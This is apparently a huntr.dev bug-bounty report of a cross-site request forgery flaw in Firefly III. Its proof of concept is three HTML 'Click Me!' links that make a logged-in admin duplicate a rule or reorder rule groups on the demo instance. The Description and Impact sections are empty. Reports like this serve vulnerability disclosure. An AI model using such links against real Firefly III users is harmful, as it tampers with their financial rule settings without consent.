Click Me! Click Me! No CSRF in duplicate rule, and modifying the order of the rule group This vulnerability is capable of tricking admin users to duplicate rule and modifying order of rule groups Permalinks selected with reference to this report: https://huntr.dev/bounties/da82f7b6-4ffc-4109-87a4-a2a790bd44e5/Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii
Description
Proof of Concept
<a href="https://demo.firefly-iii.org/rules/duplicate/1">Click Me!</a>
<a href="https://demo.firefly-iii.org/rule-groups/up/1">Click Me!</a>
<a href="https://demo.firefly-iii.org/rule-groups/down/1">Click Me!</a>
Impact